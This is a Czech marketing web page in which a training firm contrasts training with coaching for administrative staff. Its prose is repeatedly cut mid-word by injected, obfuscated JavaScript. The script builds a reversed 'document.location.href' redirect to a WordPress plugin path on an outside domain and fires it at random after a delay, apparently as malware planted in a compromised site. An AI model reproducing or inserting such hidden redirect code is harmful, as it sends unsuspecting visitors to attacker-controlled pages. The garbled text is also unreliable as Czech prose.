Trénink a Koučink

Jaký je rozdíl mezi tréninkem a koučinkem?

Trenér Vám dává jasné a pevné rady jak postupovat, trénink je příprava a vylepšování se v nějaké dovednosti. Jeho cílem je získání určitých dovedností, zkušeností a schopností a k jeho dosažení je třeba respektoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tovat trenérův postup, trenér prostě vede svůj tým pevnou rukou.

Kouč předpokládá u svých zájemců/adeptů už určité dovednosti a zkušenosti a spíše v diskusi s nimi hledá nejúčinnější způsoby, jak tatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to pozitiva v praxi využít
a dále rozvíjet. Kouč tedy „nevelí“, ale spíše taktně a ohleduplně ovlivňuje s tím, že člověk se nejlépe učí praxí a vlastní zkušeností. Prostě lidé, kteří se nechávají koučovat, chtějí vidět výsledky – a také je s dobrým koučem uvidí.

My umíme oboje!

Máme pro Vás připravené jak úspěšné trenéry, tak zkušené kouče. Každý tak může zvolit svou cestu za kariérou, podle toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toho, čeho už dosáhl a jak se cítí. Umíme pracovat jak se začátečníky v oboru, tak s těmi, kdo již pár schodů ke své kariéře vystoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toupali a nějaké zkušenosti s managementem administrativy mají.

U nás si můžete osvojit ty nejlepší postupy, efektivní přístupy a účinné metoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tody vyřízení požadavků Vašich šéfů v úspěšném procesu administrativního chodu každé firmy, úřadu či organizace.

Pro Vaši orientaci uvádíme potenciální uchazeče o náš způsob přípravy administrativních pracovníků a pracovnic na všechny stupně výuky.